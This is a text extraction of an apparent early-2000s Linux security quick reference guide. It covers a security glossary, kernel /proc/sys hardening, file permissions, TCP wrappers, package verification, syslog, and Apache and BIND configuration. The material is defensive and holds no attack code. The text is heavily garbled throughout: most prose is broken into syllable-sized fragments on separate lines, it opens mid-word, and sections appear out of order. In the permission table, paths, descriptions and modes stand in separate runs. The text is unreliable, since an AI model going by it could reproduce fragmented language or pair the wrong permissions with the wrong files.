ay m
alic
iou
sly
tra
nsfo
rm
yo
ur
da
ta in
to s
om
eth
ing
yo
u d
id n
ot
inte
nd
. U
na
uth
ori
ze
d a
cce
ss t
o y
ou
r syste
m m
ay b
e o
bta
ine
d b
y
intr
ud
ers
, a
lso
kn
ow
n a
s “
cra
cke
rs”,
wh
o th
en
use
ad
va
nce
d k
no
wle
dg
e to
imp
ers
on
ate
yo
u, ste
al i
nfo
r-
ma
tio
n f
rom
yo
u,
or
eve
n d
en
y y
ou
acce
ss t
o y
ou
r o
wn
re
so
urc
es.
Se
cu
rity
in
vo
lve
s d
efe
nse
in
de
pth
. A
pp
roa
ch
ing
se
cu
rity
a s
tep
at
a t
ime
, w
ith
co
nsis
ten
cy a
nd
vig
i-
lan
ce
, yo
u c
an
mitig
ate
th
e s
ecu
rity
th
rea
ts, a
nd
ke
ep
th
e c
racke
rs a
t b
ay.
Ke
ep
yo
ur
syste
m u
p to
da
te
by m
akin
g s
ure
yo
u h
ave
in
sta
lled
th
e c
urr
en
t ve
rsio
ns o
f so
ftw
are
an
d a
re a
wa
re o
f a
ll se
cu
rity
ale
rts.
Do
ing
th
is a
lon
e w
ill h
elp
ma
ke
yo
ur
syste
m m
ark
ed
ly m
ore
se
cu
re.
Th
e m
ore
se
cu
re y
ou
r syste
m is
th
e m
ore
intr
usiv
e y
ou
r se
cu
rity
be
co
me
s. Y
ou
ne
ed
to
de
cid
e w
he
re in
this
ba
lan
cin
g a
ct
yo
ur
syste
m w
ill s
till
be
usa
ble
ye
t se
cu
re f
or
yo
ur
pu
rpo
se
s.
If y
ou
ha
ve
mo
re t
ha
n o
ne
pe
rso
n l
og
gin
g o
n t
o y
ou
r m
ach
ine
, o
r m
ach
ine
s,
yo
u s
ho
uld
esta
blis
h a
“Se
cu
rity
Po
licy”
sta
tin
g h
ow
mu
ch
se
cu
rity
is r
eq
uir
ed
by y
ou
r site
an
d w
ha
t a
ud
itin
g i
s i
n p
lace
to
mo
nito
r it.
• B
uff
er
Ov
erf
low
: A
co
nd
itio
n t
ha
t o
ccu
rs w
he
n a
use
r o
r p
roce
ss a
tte
mp
ts t
o p
lace
mo
re d
ata
in
to a
pro
gra
m’ s
sto
rag
e b
uff
er
in m
em
ory
an
d t
he
n o
ve
rwri
tes t
he
actu
al
pro
gra
m d
ata
with
in
str
uctio
ns t
ha
t ty
pic
ally
pro
vid
e a
sh
ell
ow
ne
d b
y r
oo
t o
n t
he
se
rve
r.
Acco
un
ted
fo
r m
ore
th
an
50
pe
rce
nt
of
all
ma
jor
se
cu
rity
bu
gs le
ad
ing
to
security
advis
ories p
ublis
hed b
y C
ER
T.
Typic
ally
associa
ted w
ith s
et-
user-
ID r
oot
bin
ari
es.
• C
ryp
tog
rap
hy:
Th
e m
ath
em
atica
l scie
nce
th
at
de
als
with
tra
nsfo
rmin
g d
ata
to
re
nd
er
its m
ea
nin
g u
nin
telli
gib
le,
pre
ve
nt
its u
nd
ete
cte
d a
lte
ratio
n,
or
pre
ve
nt
its u
na
uth
ori
ze
d
use.
• D
en
ial
of
Se
rvic
e:
Occu
rs w
he
n a
re
so
urc
e is t
arg
ete
d b
y a
n in
tru
de
r to
pre
ve
nt
leg
itim
ate
use
rs f
rom
usin
g t
ha
t re
so
urc
e.
Th
ey a
re a
th
rea
t to
th
e a
va
ilab
ility
of
da
ta
to a
ll o
the
rs t
ryin
g t
o u
se
th
at
reso
urc
e.
Ra
ng
e f
rom
un
plu
gg
ing
th
e n
etw
ork
co
nn
ectio
n
to c
on
su
min
g a
ll th
e a
va
ilab
le n
etw
ork
ba
nd
wid
th.
• IP
Sp
oo
fin
g:
An
att
ack in
wh
ich
on
e h
ost
ma
sq
ue
rad
es a
s a
no
the
r .
Th
is c
an
be
use
d to
ro
ute
da
ta d
estin
ed
fo
r o
ne
ho
st to
an
toh
er,
th
ere
by a
llow
ing
att
acke
rs to
inte
rce
pt
da
ta n
ot
ori
gin
ally
in
ten
de
d f
or
the
m.
It is t
yp
ica
lly a
on
e-w
ay a
tta
ck.
• P
ort
Scan
nin
g:
Th
e p
roce
ss o
f d
ete
rmin
ing
wh
ich
po
rts a
re a
ctive
on
a m
ach
ine
. B
y
pro
bin
g a
s m
an
y h
osts
as p
ossib
le, m
ea
ns to
exp
loit th
e o
ne
s th
at re
sp
on
d c
an
be
de
ve
lop
ed
. I
t is
typ
ica
lly t
he
pre
cu
rso
r to
an
att
ack.
• P
ac
ke
t F
ilte
rin
g:
A m
eth
od
of
filte
rin
g n
etw
ork
tra
ffic
as it
pa
sse
s b
etw
ee
n t
he
fire
wa
ll’s in
terf
ace
s a
t th
e n
etw
ork
le
ve
l.
Th
e n
etw
ork
da
ta is t
he
n a
na
lyze
d a
cco
rdin
g
to t
he
in
form
atio
n a
va
ilab
le in
th
e d
ata
pa
cke
t, a
nd
acce
ss is g
ran
ted
or
de
nie
d b
ase
d
on
th
e f
ire
wa
ll se
cu
rity
po
licy.
Usu
ally
re
qu
ire
s a
n in
tim
ate
kn
ow
led
ge
of
ho
w n
etw
ork
pro
tocols
work
.
• P
roxy G
ate
way:
Als
o c
alle
d A
pp
lica
tio
n G
ate
wa
ys,
act
on
be
ha
lf o
f a
no
the
r
pro
gra
m.
A h
ost
with
a p
roxy s
erv
er
insta
lled
be
co
me
s b
oth
a s
erv
er
an
d a
clie
nt,
an
d
acts
as a
ch
oke
be
twe
en
th
e f
ina
l d
estin
atio
n a
nd
th
e c
lien
t. P
roxy s
erv
ers
are
typ
ica
lly
sm
all,
ca
refu
lly-w
ritt
en
sin
gle
-pu
rpo
se
pro
gra
ms t
ha
t o
nly
pe
rmit s
pe
cific
se
rvic
es t
o
pa
ss t
hro
ug
h it.
Typ
ica
lly c
om
bin
ed
with
pa
cke
t filte
rs.
• S
et
Us
er-
ID (
se
tuid
) /
Se
t G
rou
p-I
D (
se
tgid
): F
iles t
ha
t e
ve
ryo
ne
ca
n e
xe
cu
te a
s
eith
er
it's
ow
ne
r o
r g
rou
p p
rivile
ge
s.
Typ
ica
lly,
yo
u'll
fin
d r
oo
t-o
wn
ed
se
tuid
file
s,
wh
ich
me
an
s t
ha
t re
ga
rdle
ss o
f w
ho
exe
cu
tes t
he
m,
the
y o
bta
in root
pe
rmis
sio
n f
or
the
pe
rio
d o
f tim
e t
he
pro
gra
m is r
un
nin
g (
or
un
til th
at
pro
gra
m in
ten
tio
na
lly r
elin
qu
ish
es
the
se
pri
vile
ge
s).
Th
ese
are
th
e t
yp
es o
f file
s t
ha
t a
re m
ost
oft
en
att
acke
d b
y in
tru
de
rs,
be
ca
use
of
the
po
ten
tia
l fo
r o
bta
inin
g root
pri
vile
ge
s.
Co
mm
on
ly a
sso
cia
ted
with
bu
ffe
r o
ve
rflo
ws.
• Tro
jan
Ho
rse:
A p
rog
ram
th
at
ma
sq
ue
rad
es its
elf a
s a
be
nig
n p
rog
ram
, w
he
n in
fa
ct
it is n
ot.
A
pro
gra
m c
an
be
mo
difie
d b
y a
ma
licio
us p
rog
ram
me
r th
at
pu
rpo
rts t
o d
o
so
me
thin
g u
se
ful, b
ut
in f
act
co
nta
ins a
ma
licio
us p
rog
ram
co
nta
inin
g h
idd
en
fu
nctio
ns,
exp
loitin
g t
he
pri
vile
ge
s o
f th
e u
se
r e
xe
cu
tin
g it.
A
mo
difie
d v
ers
ion
of
/bin
/ps,
for
exa
mp
le,
ma
y b
e u
se
d t
o h
ide
th
e p
rese
nce
of
oth
er
pro
gra
ms r
un
nin
g o
n t
he
syste
m.
• V
uln
era
bil
ity:
A c
on
ditio
n t
ha
t h
as t
he
po
ten
tia
l fo
r a
llow
ing
se
cu
rity
to
be
co
mp
rom
ise
d.
Ma
ny d
if fe
ren
t ty
pe
s o
f n
etw
ork
an
d lo
ca
l vu
lne
rab
ilitie
s e
xis
t a
nd
are
wid
ely
kn
ow
n,
an
d f
req
ue
ntly o
ccu
r o
n c
om
pu
ters
re
ga
rdle
ss o
f th
eir
le
ve
l o
f n
etw
ork
connectivity,
pro
cessin
g s
peed,
or
pro
file
.
Se
ve
ral ke
rne
l co
nfig
ura
tio
n o
ptio
ns a
re a
va
ilab
le t
o im
pro
ve
se
cu
rity
th
rou
gh
th
e
/proc
pse
ud
o-f
ilesyste
m.
Qu
ite
a f
ew
of
the
file
s in
/proc/sys
are
dir
ectly r
ela
ted
to
se
cu
rity
. E
na
ble
d if
co
nta
ins a
1 a
nd
dis
ab
led
if
it c
on
tain
s a
0.
Ma
ny o
f th
e o
ptio
ns
ava
ilab
le in
/proc/sys/net/ipv4
in
clu
de
:
• ic
mp
_e
ch
o_
ign
ore
_a
ll:
Ign
ore
all
ICM
P E
CH
O r
eq
ue
sts
. E
na
blin
g t
his
op
tio
n w
ill
pre
ve
nt
this
ho
st
fro
m r
esp
on
din
g t
o ping
re
qu
ests
.
• ic
mp
_e
ch
o_
ign
ore
_b
roa
dc
as
ts: Ig
no
re IC
MP
ech
o r
eq
ue
sts
with
a b
roa
dca
st/
mu
ltic
ast
de
stin
atio
n a
dd
ress.
Yo
ur
ne
two
rk m
ay b
e u
se
d a
s a
n e
xp
lod
er
for
de
nia
l o
f
se
rvic
e p
acke
t flo
od
ing
att
acks t
o o
the
r h
osts
.
• ip
_fo
rwa
rd:
En
ab
le o
r d
isa
ble
th
e f
orw
ard
ing
of
IP p
acke
ts
be
twe
en
in
terf
ace
s.
De
fau
lt v
alu
e is d
ep
en
de
nt
on
wh
eth
er
the
ke
rne
l is
co
nfig
ure
d a
s h
ost
or
rou
ter .
• ip
_m
as
q_
de
bu
g:
En
ab
le o
r d
isa
ble
de
bu
gg
ing
of
IP m
asq
ue
rad
ing
.
• tc
p_syn
co
okie
s:
Pro
tectio
n f
rom
th
e “
SY
N A
tta
ck”.
Se
nd
syn
co
okie
s w
he
n t
he
SY
N
ba
cklo
g q
ue
ue
of
a s
ocke
t o
ve
rflo
ws.
• rp
_fi
lter:
De
term
ine
s if
so
urc
e a
dd
ress v
eri
fica
tio
n is e
na
ble
d.
En
ab
le t
his
op
tio
n o
n
all
rou
ters
to
pre
ve
nt
IP s
po
ofin
g a
tta
cks a
ga
inst
the
in
tern
al n
etw
ork
.
• s
ec
ure
_re
dir
ec
ts:
Acce
pt
ICM
P r
ed
ire
ct
me
ssa
ge
s o
nly
fo
r g
ate
wa
ys lis
ted
in
de
fau
lt
gate
way lis
t.
• lo
g_
ma
rtia
ns
: L
og
pa
cke
ts w
ith
im
po
ssib
le a
dd
resse
s t
o k
ern
el lo
g.
• a
cc
ep
t_s
ou
rce
_ro
ute
: D
ete
rmin
es w
he
the
r so
urc
e r
ou
ted
pa
cke
ts a
re a
cce
pte
d o
r
de
clin
ed
. S
ho
uld
be
dis
ab
led
un
less s
pe
cific
re
aso
n r
eq
uir
es it.
Th
e f
ile /
etc
/sysctl
.co
nf
on
re
ce
nt
Re
d H
at
co
nta
ins a
fe
w d
efa
ult s
ett
ing
s a
nd
is
pro
ce
sse
d a
t syste
m s
tart
up
. T
he
/sb
in/s
ysctl
pro
gra
m c
an
be
use
d to
co
ntr
ol th
ese
pa
ram
ete
rs.
It is a
lso
po
ssib
le t
o c
on
fig
ure
th
eir
va
lue
s u
sin
g /b
in/e
ch
o.
Fo
r e
xa
mp
le,
to d
isa
ble
IP
fo
rwa
rdin
g,
as r
oo
t ru
n:
echo “0” > /proc/sys/net/ipv4/ip_forward
Th
is m
ust
wri
tte
n t
o a
syste
m s
tart
up
file
or /etc/sysctl.conf
on
Re
d H
at
to o
ccu
r
aft
er
ea
ch
re
bo
ot.
Mo
re in
form
atio
n is a
va
ilab
le in
proc.txt
file
in
th
e k
ern
el
Documentation/
directo
ry.
htt
p:/
/ww
w.L
inu
xS
ecu
rity
.com
info
@L
inu
xS
ecu
rity
.com
• D
ete
ct
an
d a
lert
ba
se
d o
n p
att
ern
ma
tch
ing
fo
r th
rea
ts in
clu
din
g b
uffe
r o
ve
rflo
ws,
ste
alth
po
rt s
ca
ns,
CG
I a
tta
cks,
SM
B p
rob
es a
nd
Ne
tBIO
S q
ue
rie
s,
NM
AP
an
d
oth
er
po
rtsca
nn
ers
, w
ell-
kn
ow
n b
ackd
oo
rs a
nd
syste
m v
uln
era
bili
tie
s,
DD
oS
clie
nts
, a
nd
ma
ny m
ore
;
• C
an
be
use
d o
n a
n e
xis
tin
g w
ork
sta
tio
n t
o m
on
ito
r a
ho
me
DS
L c
on
ne
ctio
n,
or
on
a d
ed
ica
ted
se
rve
r to
mo
nito
r a
co
rpo
rate
we
b s
ite
.
Intr
usio
n d
ete
ctio
n d
evic
es a
re a
n in
teg
ral p
art
of
an
y n
etw
ork
. T
he
In
tern
et
is
co
nsta
ntly e
vo
lvin
g,
an
d n
ew
vu
lne
rab
ilitie
s a
nd
exp
loits a
re f
ou
nd
re
gu
larl
y. T
he
y
pro
vid
e a
n a
dd
itio
na
l le
ve
l o
f p
rote
ctio
n t
o d
ete
ct
the
pre
se
nce
of
an
in
tru
de
r, a
nd
he
lp
to p
rovid
e a
cco
uta
bili
ty f
or
the
att
acke
r's a
ctio
ns.
Th
e snort
ne
two
rk in
tru
sio
n d
ete
ctio
n t
oo
l p
erf
orm
s r
ea
l-tim
e t
raff
ic a
na
lysis
,
wa
tch
ing
fo
r a
na
mo
lou
s e
ve
nts
th
at
ma
y b
e c
on
sid
ere
d a
po
ten
tia
l in
tru
sio
n a
tte
mp
t.
Ba
se
d o
n t
he
co
nte
nts
of
the
ne
two
rk t
raff
ic,
at
eith
er
the
IP
or
ap
plic
atio
n le
ve
l, a
n
ale
rt is g
en
era
ted
. It
is e
asily
co
nfig
ure
d,
utiliz
es f
am
ilia
r m
eth
od
s f
or
rule
de
ve
lop
me
nt,
an
d t
ake
s o
nly
a f
ew
min
ute
s t
o in
sta
ll. S
no
rt c
urr
en
tly in
clu
de
s t
he
ab
ility
to
de
tect
mo
re t
ha
n 1
10
0 p
ote
ntia
l vu
lne
rab
ilitie
s.
It is q
uite
fe
atu
re-p
acke
d o
ut
of
the
bo
x:
© 2
000 G
uard
ian
Dig
ital, I
nc.
htt
p:/
/ww
w.G
ua
rdia
nD
igit
al.
co
m
Imp
lem
en
tati
on
By
Da
ve
Wre
sk
iC
on
cep
t B
y B
en
jam
in T
ho
mas
Pe
rmis
sio
n t
o d
istr
ibu
te g
ran
ted
Intr
od
uc
tio
n:
Co
ntr
ollin
g F
ile P
erm
issio
ns &
Att
rib
ute
s:
Secu
rity
Glo
ssary
:
Kern
el
Secu
rity
:
Gen
era
l S
ecu
rity
Tip
s:
Ne
two
rk I
ntr
us
ion
De
tec
tio
n:
Lin
ux S
ecu
rity
Reso
urc
es:
v1.1
74
/var/log
/var/log/messages
/etc/crontab
/etc/syslog.conf
/etc/logrotate.conf
/var/log/wtmp
/var/log/lastlog
/etc/ftpusers
/etc/passwd
/etc/shadow
/etc/pam.d
/etc/hosts.allow
/etc/hosts.deny
/etc/lilo.conf
/etc/securetty
/etc/shutdown.allow
/etc/security
/etc/rc.d/init.d
/etc/init.d
/etc/sysconfig
/etc/inetd.conf
/etc/cron.allow
/etc/cron.deny
/etc/ssh
/etc/sysctl.conf
Dire
cto
ry c
on
tain
ing
all
log
file
s
Syste
m m
essa
ge
s
Syste
m-w
ide
cro
nta
b f
ile
Syslo
g d
ae
mo
n c
on
fig
ura
tio
n f
ile
Co
ntr
ols
ro
tatin
g o
f syste
m lo
g f
iles
Wh
o is lo
gg
ed
in
no
w.
Use
who
to v
iew
Wh
o h
as lo
gg
ed
in
be
fore
. U
se
last
to
vie
w
Lis
t o
f u
se
rs t
ha
t ca
nn
ot F
TP
Lis
t o
f th
e s
yste
m’s
use
r a
cco
un
ts
Co
nta
ins e
ncry
pte
d a
cco
un
t p
assw
ord
s
PA
M c
on
fig
ura
tio
n f
iles
Acce
ss c
on
tro
l file
Acce
ss c
on
tro
l file
Bo
ot
loa
de
r co
nfig
ura
tio
n f
ile
TT
Y in
terf
ace
s t
ha
t a
llow
ro
ot
log
ins
Use
rs p
erm
itte
d t
o c
trl-
alt-d
el
Syste
m a
cce
ss s
ecu
rity
po
licy f
iles
Pro
gra
m s
tart
-up
file
s o
n R
ed
Ha
t syste
ms
Pro
gra
m s
tart
-up
file
s o
n D
eb
ian
syste
ms
Syste
m a
nd
ne
two
rk c
on
fig
file
s o
n R
ed
Ha
t
Inte
rne
t S
up
erS
erv
er
co
nfig
ura
tio
n f
ile
Lis
t o
f u
se
rs p
erm
itte
d t
o u
se
cron
Lis
t o
f u
se
rs d
en
ied
acce
ss to
cron
Se
cu
re S
he
ll co
nfig
ura
tio
n f
iles
Co
nta
ins k
ern
el tu
na
ble
op
tio
ns o
n r
ece
nt R
ed
Ha
t
751
644
600
640
640
660
640
600
644
600
750
600
600
600
600
400
700
750
750
751
600
400
400
750
400
Fil
e/D
irec
tory
Per
ms
Des
crip
tion
Fre
qu
en
tly u
se
d t
o m
on
ito
r a
nd
co
ntr
ol a
cce
ss t
o s
erv
ice
s lis
ted
in
/etc/inetd.conf
. T
he
in.ftpd
se
rvic
e m
igh
t b
e w
rap
pe
d u
sin
g:
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o
Be
fore
th
e in.telnetd
da
em
on
is s
pa
wn
ed
, tcpd
fir
st
de
term
ine
s if
the
so
urc
e is a
pe
rmitte
d h
ost.
C
on
ne
ctio
n a
tte
mp
ts a
re s
en
t to
syslogd
. A
ll
se
rvic
es s
ho
uld
be
dis
ab
led
by d
efa
ult in
/etc/hosts.deny
usin
g t
he
follo
win
g:
ALL: ALL
To
se
nd
an
em
ail
to t
he
ad
min
an
d r
ep
ort
fa
iled
co
nn
ectio
n a
tte
mp
t:
ALL: ALL: /bin/mail \
-s “%s connection attempt from %c” [email protected]
En
ab
le s
pe
cific
se
rvic
es in
/etc/hosts.allow
usin
g t
he
se
rvic
e n
am
e
follo
we
d b
y t
he
ho
st:
sshd: magneto.mydom.com, juggernaut.mydom.com
in.ftpd: 192.168.1.
Tra
ilin
g p
eri
od
in
dic
ate
s e
ntire
ne
two
rk s
ho
uld
be
pe
rmitte
d.
Use
tcpdchk
to
ve
rify
yo
ur
acce
ss f
iles.
A s
yslo
g e
ntr
y w
ill b
e c
rea
ted
fo
r fa
iled
att
em
pts
.
Acce
ss c
on
tro
l is
pe
rfo
rme
d in
th
e f
ollo
win
g o
rde
r:
Th
e /bin/rpm
pro
gra
m o
n R
ed
Ha
t a
nd
de
rivitiv
es a
nd
th
e /usr/bin/dpkg
on
De
bia
n a
nd
de
rivitiv
es a
re u
se
d t
o c
on
tro
l th
e m
an
ag
em
en
t o
f p
acka
ge
s.
• R
em
ove
a p
acka
ge
# rpm -e <package-name>
# dpkg -r <package-name>
• L
ist
co
nte
nts
of
en
tire
pa
cka
ge
# rpm -qvl <package-name.rpm>
# dpkg -c <package-name.deb>
• L
ist
all
insta
lled
pa
cka
ge
s w
ith
in
fo a
bo
ut
ea
ch
# rpm -qvia
# dpkg -l
• L
ist
co
nte
nts
of
a p
acka
ge
# rpm -qvpl <package-name.rpm>
# dpkg -c <package-name.deb>
• P
rin
t in
form
atio
n a
bo
ut
a p
acka
ge
# rpm -qpi <package-name.rpm>
# dpkg -I <package-name.deb>
• V
erify
package c
hara
cte
ristics (
basic
inte
grity
check)
# rpm -Va
# debsums -a
• D
ete
rmin
e t
o w
hic
h p
acka
ge
a f
ile b
elo
ng
s
# rpm -qf </path/to/file>
# dpkg -S </path/to/file>
• In
sta
ll n
ew
pa
cka
ge
# rpm -Uvh <package-name.rpm>
# dpkg -i <package-name.deb>
Th
e syslogd
is r
esp
on
sib
le f
or
ca
ptu
rin
g lo
gg
ing
in
form
atio
n g
en
era
ted
by
syste
m p
roce
sse
s.
Th
e klogd
is r
esp
on
sib
le f
or
ca
ptu
rin
g lo
gg
ing
in
form
atio
n
ge
ne
rate
d b
y t
he
ke
rne
l. S
yste
m lo
gs p
rovid
e t
he
pri
ma
ry in
dic
atio
n o
f a
po
ten
tia
l
pro
ble
m.
• F
ine
-tu
ne
th
e d
efa
ult /etc/syslog.conf
to
se
nd
lo
g in
form
atio
n t
o s
pe
cific
file
s f
or
ea
sie
r a
na
lysis
.
# Monitor authentication attempts
auth.*;authpriv.*
/var/log/authlog
# Monitor all kernel messages
kern.*
/var/log/kernlog
# Monitor all warning and error messages
*.warn;*.err
/var/log/syslog
# Send a copy to remote loghost. Configure syslogd init
# script to run with -r -s domain.com options on log
# server. Ensure a high level of security on the log
# server!
*.info
@loghost
auth.*;authpriv.*
@loghost
• R
estr
ict
acce
ss t
o lo
g d
ire
cto
ry a
nd
syslo
g f
iles f
or
no
rma
l u
se
rs u
sin
g:
# chmod 751 /var/log /etc/logrotate.d
# chmod 640 /etc/syslog.conf /etc/logrotate.conf
# chmod 640 /var/log/*log
Th
e md5sum
co
mm
an
d is u
se
d t
o c
om
pu
te a
12
8-b
it f
ing
erp
rin
t th
at
is s
tro
ng
ly
de
pe
nd
an
t u
po
n t
he
co
nte
nts
of
the
file
to
wh
ich
it
is a
pp
lied
. It
ca
n b
e u
se
d t
o
co
mp
are
ag
ain
st
a p
revio
usly
-ge
ne
rate
d s
um
to
de
term
ine
wh
eth
er
the
file
ha
s
ch
an
ge
d.
It is c
om
mo
nly
use
d t
o e
nsu
re t
he
in
teg
rity
of
up
da
ted
pa
cka
ge
s
dis
trib
ute
d b
y a
ve
nd
or:
# md5sum package-name
995d4f40cda13eacd2beaf35c1c4d5c2 package-name
Th
e s
trin
g o
f n
um
be
rs c
an
th
en
be
co
mp
are
d a
ga
inst th
e M
D5
ch
ecksu
m
pu
blis
he
d b
y t
he
pa
cka
ge
r. W
hile
it
do
es n
ot
take
in
to a
cco
un
t th
e p
ossib
ility
th
at
the
sa
me
pe
rso
n t
ha
t m
ay h
ave
mo
difie
d a
pa
cka
ge
als
o m
ay h
ave
mo
difie
d t
he
pu
blis
he
d c
he
cksu
m,
it is e
sp
ecia
lly u
se
ful fo
r e
sta
blis
hin
g a
gre
at
de
al o
f
assu
ran
ce
in
th
e in
teg
rity
of
a p
acka
ge
be
fore
in
sta
llin
g it.
• L
imit A
pa
ch
e t
o lis
ten
on
ly o
n lo
ca
l in
terf
ace
by c
on
fig
uri
ng
/etc/httpd/conf/httpd.conf
to
re
ad
:
Listen 127.0.0.1:80
• U
se
th
e f
ollo
win
g t
o d
isa
ble
acce
ss t
o t
he
en
tire
file
syste
m b
y d
efa
ult,
un
less
exp
licitly
pe
rmitte
d.
Th
is w
ill d
isa
ble
pri
ntin
g o
f in
de
xe
s if
no
in
de
x.h
tml
exis
ts,
serv
er-
sid
e inclu
des,
and f
ollo
win
g s
ym
bolic
lin
ks.
Dis
ablin
g s
ym
links
ma
y im
pa
ct
pe
rfo
rma
nce
fo
r la
rge
site
s.
<Directory />
Options None
AllowOverride None
Order deny,allow
Deny from all
</Directory>
• U
se
th
e f
ollo
win
g t
o c
on
tro
l a
cce
ss t
o t
he
se
rve
r fr
om
lim
ite
d
ad
dre
sse
s in
/etc/httpd/conf/access.conf
to
re
ad
:
<Directory /home/httpd/html>
# Deny all accesses by default
Order deny,allow
# Allow access to local machine
Allow from 127.0.0.1
# Allow access to entire local network
Allow from 192.168.1.
# Allow access to single remote host
Allow from 192.168.5.3
# Deny from everyone else
Deny from all
</Directory>
• U
se
th
e f
ollo
win
g t
o r
eq
uir
e p
assw
ord
au
the
ntica
tio
n w
he
n a
tte
mp
tin
g t
o
acce
ss a
sp
ecific
dir
ecto
ry in
/etc/httpd/conf/access.conf
:
<Directory /home/httpd/html/protected>
Order Deny,Allow
Deny from All
Allow from 192.168.1.11
AuthName “Private Information”
AuthType Basic
AuthUserFile /etc/httpd/conf/private-users
AuthGroupFile /etc/httpd/conf/private-groups
require group <group-name>
</Directory>
Cre
ate
th
e private-groups
file
usin
g t
he
fo
llow
ing
fo
rma
t:
group-name: user1 user2 user...
Cre
ate
pa
ssw
ord
en
trie
s f
or
ea
ch
use
r in
th
e a
bo
ve
lis
t:
# htpasswd -cm /etc/httpd/conf/private-users user1
New password: <password>
Re-type new password: <password>
Adding password for user user1
Be
su
re t
o r
esta
rt a
pa
ch
e a
nd
te
st
it.
Th
is w
ill r
esu
lt in
th
e e
na
blin
g o
f d
ou
ble
reve
rse
lo
oku
ps t
o v
eri
fy t
he
id
en
tity
of
the
re
mo
te h
ost.
Re
mo
ve
th
e -c
op
tio
n t
o htpasswd
aft
er
the
fir
st u
se
r h
as b
ee
n a
dd
ed
. B
e s
ure
th
e p
assw
ord
file
yo
u c
rea
te is n
ot
loca
ted
with
in t
he
DocumentRoot
to
pre
ve
nt
it f
rom
be
ing
do
wn
loa
de
d.
• Z
on
e t
ran
sfe
rs s
ho
uld
on
ly b
e p
erm
itte
d b
y m
aste
r n
am
e s
erv
ers
to
up
da
te t
he
zo
ne
(do
ma
in)
info
rma
tio
n in
th
eir
sla
ve
se
rve
rs.
Fa
ilure
to
do
so
ma
y r
esu
lt in
IP
nu
mb
ers
an
d
ho
stn
am
es b
ein
g r
eve
ale
d t
o u
na
uth
ori
ze
d u
se
rs.
Re
str
ict
qu
eri
es t
o o
nly
pu
blic
do
ma
ins.
Su
ita
ble
fo
r n
am
e s
erv
ers
with
bo
th p
ub
lic a
nd
pri
va
te z
on
es.
// Allow transfer only to our slave name server. Allow queries
// only by hosts in the 192.168.1.0 network.
zone “mydomain.com” {
type master;
file “master/db.mydomain.com”;
allow-transfer { 192.168.1.6; };
allow-query { 192.168.1.0/24; };
};
• D
en
y a
nd
lo
g q
ue
rie
s f
or
ou
r ve
rsio
n n
um
be
r e
xce
pt
fro
m t
he
lo
ca
l h
ost.
Th
e a
bili
ty t
o
de
term
ine
th
e b
ind
ve
rsio
n e
na
ble
s a
n a
tta
cke
r to
fin
d t
he
co
rre
sp
on
din
g e
xp
loit f
or
tha
t
ve
rsio
n.
// Disable the ability to determine the version of BIND running
zone “bind” chaos {
type master;
file “master/bind”;
allow-query { localhost; };
};
Th
e ./master/bind
file
sh
ou
ld t
he
n c
on
tain
:
$TTL 1d
@ CHAOS SOA localhost. root.localhost. (
1 ; serial
3H ; refresh
15M ; retry
1W ; expire
1D ) ; minimum
NS localhost.
• C
on
tro
l w
hic
h in
terf
ace
s named
lis
ten
s o
n.
Re
str
ictin
g t
he
in
terf
ace
s o
n w
hic
h n
am
ed
run
s c
an
lim
it t
he
exp
osu
re t
o o
nly
th
e n
ece
ssa
ry n
etw
ork
s.
listen-on { 192.168.1.1; };
• U
se
Acce
ss C
on
tro
l L
ists
to
cla
ssify g
rou
ps o
f h
osts
with
diff
eri
ng
de
gre
es o
f tr
ust.
T
he
“in
tern
al”
AC
L la
be
l m
igh
t b
e u
se
d t
o d
escri
be
in
tern
al h
osts
th
at
are
pe
rmitte
d a
gre
ate
r
de
gre
e o
f a
cce
ss t
o t
he
in
form
atio
n t
ha
n o
the
r h
osts
mig
ht
be
. B
efo
re it
ca
n b
e u
se
d it
mu
st
be
de
fin
ed
:
acl “internal” {
{ 192.168.1.0/24; 192.168.2.11; };
};
It c
an
th
en
be
use
d in
“zo
ne
” sta
tem
en
ts o
r th
e m
ain
“o
ptio
ns”
sta
tem
en
t:
zone “inside.mynet.com” {
type master;
file “master/inside.mynet.com”;
allow-query { “internal”; };
};
• C
on
fig
ure
BIN
D t
o r
un
as a
no
rma
l u
se
r. O
nce
BIN
D h
as b
ee
n s
tart
ed
, it h
as t
he
ab
ility
to r
elin
qu
ish
its
pri
vile
ge
s,
an
d r
un
as a
use
r w
ith
lim
ite
d a
bili
tie
s in
ste
ad
of
roo
t.
# useradd -M -r -d /var/named -s /bin/false named
# groupadd -r named
Th
is a
cco
un
t sh
ou
ld b
e u
se
d f
or
no
thin
g o
the
r th
an
ru
nn
ing
th
e n
am
e s
erv
er.
En
su
re t
he
zo
ne
file
s a
re r
ea
da
ble
by t
he
named
use
r. I
t is
th
en
ne
ce
ssa
ry t
o m
od
ify t
he
de
fau
lt
named
in
it s
cri
pt,
typ
ica
lly f
ou
nd
in
/etc/rc.d/init.d/named
on
Re
d H
at
or
/etc/init.d/named
on
De
bia
n:
/usr/sbin/named -u named -g named
It is a
lso
po
ssib
le t
o r
un
named
in
a “
ch
roo
t ja
il” w
hic
h h
elp
s t
o r
estr
ict
the
da
ma
ge
th
at
ca
n b
e d
on
e s
ho
uld
named
be
su
bve
rte
d.
Tri
pw
ire
is a
pro
gra
m t
ha
t m
on
ito
rs f
ile in
teg
rity
by m
ain
tain
ing
a d
ata
ba
se
of
cry
pto
gra
ph
ic s
ign
atu
res f
or
pro
gra
ms a
nd
co
nfig
ura
tio
n f
iles in
sta
lled
on
th
e
syste
m,
an
d r
ep
ort
s c
ha
ng
es in
an
y o
f th
ese
file
s.
A d
ata
ba
se
of
ch
ecksu
ms a
nd
oth
er
ch
ara
cte
ristics f
or
the
file
s lis
ted
in
th
e
co
nfig
ura
tio
n f
ile is c
rea
ted
. E
ach
su
bse
qu
en
t ru
n c
om
pa
res a
ny d
iffe
ren
ce
s t
o
the
re
fere
nce
da
tab
ase
, a
nd
th
e a
dm
inis
tra
tor
is n
otifie
d.
Th
e g
rea
test
leve
l o
f a
ssu
ran
ce
th
at
ca
n b
e p
rovid
ed
occu
rs if
Tri
pw
ire
is r
un
imm
ed
iate
ly a
fte
r L
inu
x h
as b
ee
n in
sta
lled
an
d s
ecu
rity
up
da
tes a
pp
lied
, a
nd
be
fore
it
is c
on
ne
cte
d t
o a
ne
two
rk.
A t
ext
co
nfig
ura
tio
n f
ile,
ca
lled
a p
olic
y f
ile,
is u
se
d t
o d
efin
e t
he
ch
ara
cte
ristics f
or
ea
ch
file
th
at
are
tra
cke
d.
Yo
ur
leve
l o
f p
ara
no
ia d
ete
rmin
es t
